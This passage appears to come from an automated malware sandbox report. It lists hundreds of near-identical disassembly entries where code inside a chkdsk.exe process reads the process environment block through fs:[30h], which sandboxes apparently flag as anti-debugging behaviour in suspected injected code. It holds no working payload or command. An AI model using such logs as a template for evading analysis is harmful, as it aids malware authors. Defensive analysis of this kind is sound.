      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE588 mov eax, dword ptr fs:[00000030h]22_2_058CE588
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588A580 mov eax, dword ptr fs:[00000030h]22_2_0588A580
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588A580 mov eax, dword ptr fs:[00000030h]22_2_0588A580
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05889580 mov eax, dword ptr fs:[00000030h]22_2_05889580
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05889580 mov eax, dword ptr fs:[00000030h]22_2_05889580
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F582 mov eax, dword ptr fs:[00000030h]22_2_0590F582
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05882594 mov eax, dword ptr fs:[00000030h]22_2_05882594
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DC592 mov eax, dword ptr fs:[00000030h]22_2_058DC592
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D85AA mov eax, dword ptr fs:[00000030h]22_2_058D85AA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058545B0 mov eax, dword ptr fs:[00000030h]22_2_058545B0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058545B0 mov eax, dword ptr fs:[00000030h]22_2_058545B0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F5C7 mov eax, dword ptr fs:[00000030h]22_2_0584F5C7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D05C6 mov eax, dword ptr fs:[00000030h]22_2_058D05C6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588C5C6 mov eax, dword ptr fs:[00000030h]22_2_0588C5C6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058865D0 mov eax, dword ptr fs:[00000030h]22_2_058865D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585B5E0 mov eax, dword ptr fs:[00000030h]22_2_0585B5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585B5E0 mov eax, dword ptr fs:[00000030h]22_2_0585B5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585B5E0 mov eax, dword ptr fs:[00000030h]22_2_0585B5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585B5E0 mov eax, dword ptr fs:[00000030h]22_2_0585B5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585B5E0 mov eax, dword ptr fs:[00000030h]22_2_0585B5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585B5E0 mov eax, dword ptr fs:[00000030h]22_2_0585B5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058815EF mov eax, dword ptr fs:[00000030h]22_2_058815EF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588A5E7 mov ebx, dword ptr fs:[00000030h]22_2_0588A5E7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588A5E7 mov eax, dword ptr fs:[00000030h]22_2_0588A5E7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DC5FC mov eax, dword ptr fs:[00000030h]22_2_058DC5FC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E507 mov eax, dword ptr fs:[00000030h]22_2_0587E507
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588C50D mov eax, dword ptr fs:[00000030h]22_2_0588C50D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588C50D mov eax, dword ptr fs:[00000030h]22_2_0588C50D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05852500 mov eax, dword ptr fs:[00000030h]22_2_05852500
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B502 mov eax, dword ptr fs:[00000030h]22_2_0584B502
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DC51D mov eax, dword ptr fs:[00000030h]22_2_058DC51D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05871514 mov eax, dword ptr fs:[00000030h]22_2_05871514
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05871514 mov eax, dword ptr fs:[00000030h]22_2_05871514
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05871514 mov eax, dword ptr fs:[00000030h]22_2_05871514
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05871514 mov eax, dword ptr fs:[00000030h]22_2_05871514
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05871514 mov eax, dword ptr fs:[00000030h]22_2_05871514
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05871514 mov eax, dword ptr fs:[00000030h]22_2_05871514
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov ecx, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov ecx, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF51B mov eax, dword ptr fs:[00000030h]22_2_058FF51B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588F523 mov eax, dword ptr fs:[00000030h]22_2_0588F523
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586252B mov eax, dword ptr fs:[00000030h]22_2_0586252B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586252B mov eax, dword ptr fs:[00000030h]22_2_0586252B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586252B mov eax, dword ptr fs:[00000030h]22_2_0586252B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586252B mov eax, dword ptr fs:[00000030h]22_2_0586252B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586252B mov eax, dword ptr fs:[00000030h]22_2_0586252B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586252B mov eax, dword ptr fs:[00000030h]22_2_0586252B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586252B mov eax, dword ptr fs:[00000030h]22_2_0586252B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05881527 mov eax, dword ptr fs:[00000030h]22_2_05881527
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892539 mov eax, dword ptr fs:[00000030h]22_2_05892539
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05853536 mov eax, dword ptr fs:[00000030h]22_2_05853536
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05853536 mov eax, dword ptr fs:[00000030h]22_2_05853536
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584753F mov eax, dword ptr fs:[00000030h]22_2_0584753F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584753F mov eax, dword ptr fs:[00000030h]22_2_0584753F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584753F mov eax, dword ptr fs:[00000030h]22_2_0584753F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586E547 mov eax, dword ptr fs:[00000030h]22_2_0586E547
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591A553 mov eax, dword ptr fs:[00000030h]22_2_0591A553
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05886540 mov eax, dword ptr fs:[00000030h]22_2_05886540
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05888540 mov eax, dword ptr fs:[00000030h]22_2_05888540
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585254C mov eax, dword ptr fs:[00000030h]22_2_0585254C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592B55F mov eax, dword ptr fs:[00000030h]22_2_0592B55F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592B55F mov eax, dword ptr fs:[00000030h]22_2_0592B55F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586C560 mov eax, dword ptr fs:[00000030h]22_2_0586C560
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05850485 mov ecx, dword ptr fs:[00000030h]22_2_05850485
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588648A mov eax, dword ptr fs:[00000030h]22_2_0588648A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588648A mov eax, dword ptr fs:[00000030h]22_2_0588648A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588648A mov eax, dword ptr fs:[00000030h]22_2_0588648A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588B490 mov eax, dword ptr fs:[00000030h]22_2_0588B490
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588B490 mov eax, dword ptr fs:[00000030h]22_2_0588B490
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DC490 mov eax, dword ptr fs:[00000030h]22_2_058DC490
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058844A8 mov eax, dword ptr fs:[00000030h]22_2_058844A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058524A2 mov eax, dword ptr fs:[00000030h]22_2_058524A2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058524A2 mov ecx, dword ptr fs:[00000030h]22_2_058524A2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DD4A0 mov ecx, dword ptr fs:[00000030h]22_2_058DD4A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DD4A0 mov eax, dword ptr fs:[00000030h]22_2_058DD4A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DD4A0 mov eax, dword ptr fs:[00000030h]22_2_058DD4A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588E4BC mov eax, dword ptr fs:[00000030h]22_2_0588E4BC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058714C9 mov eax, dword ptr fs:[00000030h]22_2_058714C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058714C9 mov eax, dword ptr fs:[00000030h]22_2_058714C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058714C9 mov eax, dword ptr fs:[00000030h]22_2_058714C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058714C9 mov eax, dword ptr fs:[00000030h]22_2_058714C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058714C9 mov eax, dword ptr fs:[00000030h]22_2_058714C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058744D1 mov eax, dword ptr fs:[00000030h]22_2_058744D1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058744D1 mov eax, dword ptr fs:[00000030h]22_2_058744D1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F4D0 mov eax, dword ptr fs:[00000030h]22_2_0587F4D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588E4EF mov eax, dword ptr fs:[00000030h]22_2_0588E4EF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588E4EF mov eax, dword ptr fs:[00000030h]22_2_0588E4EF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058854E0 mov eax, dword ptr fs:[00000030h]22_2_058854E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F4FD mov eax, dword ptr fs:[00000030h]22_2_0590F4FD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058564F0 mov eax, dword ptr fs:[00000030h]22_2_058564F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588A4F0 mov eax, dword ptr fs:[00000030h]22_2_0588A4F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588A4F0 mov eax, dword ptr fs:[00000030h]22_2_0588A4F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058794FA mov eax, dword ptr fs:[00000030h]22_2_058794FA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584640D mov eax, dword ptr fs:[00000030h]22_2_0584640D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E6400 mov eax, dword ptr fs:[00000030h]22_2_058E6400
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E6400 mov eax, dword ptr fs:[00000030h]22_2_058E6400
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F409 mov eax, dword ptr fs:[00000030h]22_2_0590F409
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DF42F mov eax, dword ptr fs:[00000030h]22_2_058DF42F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DF42F mov eax, dword ptr fs:[00000030h]22_2_058DF42F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DF42F mov eax, dword ptr fs:[00000030h]22_2_058DF42F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DF42F mov eax, dword ptr fs:[00000030h]22_2_058DF42F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DF42F mov eax, dword ptr fs:[00000030h]22_2_058DF42F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B420 mov eax, dword ptr fs:[00000030h]22_2_0584B420
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D9429 mov eax, dword ptr fs:[00000030h]22_2_058D9429
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05887425 mov eax, dword ptr fs:[00000030h]22_2_05887425
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05887425 mov ecx, dword ptr fs:[00000030h]22_2_05887425
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860445 mov eax, dword ptr fs:[00000030h]22_2_05860445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860445 mov eax, dword ptr fs:[00000030h]22_2_05860445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860445 mov eax, dword ptr fs:[00000030h]22_2_05860445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860445 mov eax, dword ptr fs:[00000030h]22_2_05860445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860445 mov eax, dword ptr fs:[00000030h]22_2_05860445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860445 mov eax, dword ptr fs:[00000030h]22_2_05860445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D0443 mov eax, dword ptr fs:[00000030h]22_2_058D0443
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585D454 mov eax, dword ptr fs:[00000030h]22_2_0585D454
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585D454 mov eax, dword ptr fs:[00000030h]22_2_0585D454
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585D454 mov eax, dword ptr fs:[00000030h]22_2_0585D454
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585D454 mov eax, dword ptr fs:[00000030h]22_2_0585D454
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585D454 mov eax, dword ptr fs:[00000030h]22_2_0585D454
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585D454 mov eax, dword ptr fs:[00000030h]22_2_0585D454
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588D450 mov eax, dword ptr fs:[00000030h]22_2_0588D450
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588D450 mov eax, dword ptr fs:[00000030h]22_2_0588D450
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E45E mov eax, dword ptr fs:[00000030h]22_2_0587E45E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E45E mov eax, dword ptr fs:[00000030h]22_2_0587E45E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E45E mov eax, dword ptr fs:[00000030h]22_2_0587E45E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E45E mov eax, dword ptr fs:[00000030h]22_2_0587E45E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E45E mov eax, dword ptr fs:[00000030h]22_2_0587E45E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F478 mov eax, dword ptr fs:[00000030h]22_2_0590F478
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05858470 mov eax, dword ptr fs:[00000030h]22_2_05858470
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05858470 mov eax, dword ptr fs:[00000030h]22_2_05858470
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591A464 mov eax, dword ptr fs:[00000030h]22_2_0591A464
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE79D mov eax, dword ptr fs:[00000030h]22_2_058CE79D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592B781 mov eax, dword ptr fs:[00000030h]22_2_0592B781
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0592B781 mov eax, dword ptr fs:[00000030h]22_2_0592B781
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05881796 mov eax, dword ptr fs:[00000030h]22_2_05881796
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05881796 mov eax, dword ptr fs:[00000030h]22_2_05881796
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058507A7 mov eax, dword ptr fs:[00000030h]22_2_058507A7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059217BC mov eax, dword ptr fs:[00000030h]22_2_059217BC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591D7A7 mov eax, dword ptr fs:[00000030h]22_2_0591D7A7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591D7A7 mov eax, dword ptr fs:[00000030h]22_2_0591D7A7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591D7A7 mov eax, dword ptr fs:[00000030h]22_2_0591D7A7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F7CF mov eax, dword ptr fs:[00000030h]22_2_0590F7CF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058537E4 mov eax, dword ptr fs:[00000030h]22_2_058537E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058537E4 mov eax, dword ptr fs:[00000030h]22_2_058537E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058537E4 mov eax, dword ptr fs:[00000030h]22_2_058537E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058537E4 mov eax, dword ptr fs:[00000030h]22_2_058537E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058537E4 mov eax, dword ptr fs:[00000030h]22_2_058537E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058537E4 mov eax, dword ptr fs:[00000030h]22_2_058537E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058537E4 mov eax, dword ptr fs:[00000030h]22_2_058537E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587E7E0 mov eax, dword ptr fs:[00000030h]22_2_0587E7E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058577F9 mov eax, dword ptr fs:[00000030h]22_2_058577F9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058577F9 mov eax, dword ptr fs:[00000030h]22_2_058577F9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B705 mov eax, dword ptr fs:[00000030h]22_2_0584B705
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B705 mov eax, dword ptr fs:[00000030h]22_2_0584B705
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B705 mov eax, dword ptr fs:[00000030h]22_2_0584B705
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584B705 mov eax, dword ptr fs:[00000030h]22_2_0584B705
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585D700 mov ecx, dword ptr fs:[00000030h]22_2_0585D700
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F717 mov eax, dword ptr fs:[00000030h]22_2_0590F717
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587270D mov eax, dword ptr fs:[00000030h]22_2_0587270D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587270D mov eax, dword ptr fs:[00000030h]22_2_0587270D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587270D mov eax, dword ptr fs:[00000030h]22_2_0587270D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591970B mov eax, dword ptr fs:[00000030h]22_2_0591970B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591970B mov eax, dword ptr fs:[00000030h]22_2_0591970B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585471B mov eax, dword ptr fs:[00000030h]22_2_0585471B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585471B mov eax, dword ptr fs:[00000030h]22_2_0585471B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05879723 mov eax, dword ptr fs:[00000030h]22_2_05879723
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588174A mov eax, dword ptr fs:[00000030h]22_2_0588174A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D174B mov eax, dword ptr fs:[00000030h]22_2_058D174B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D174B mov ecx, dword ptr fs:[00000030h]22_2_058D174B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05883740 mov eax, dword ptr fs:[00000030h]22_2_05883740
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05872755 mov eax, dword ptr fs:[00000030h]22_2_05872755
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05872755 mov eax, dword ptr fs:[00000030h]22_2_05872755
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05872755 mov eax, dword ptr fs:[00000030h]22_2_05872755
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05872755 mov ecx, dword ptr fs:[00000030h]22_2_05872755
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05872755 mov eax, dword ptr fs:[00000030h]22_2_05872755
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05872755 mov eax, dword ptr fs:[00000030h]22_2_05872755
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588A750 mov eax, dword ptr fs:[00000030h]22_2_0588A750
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
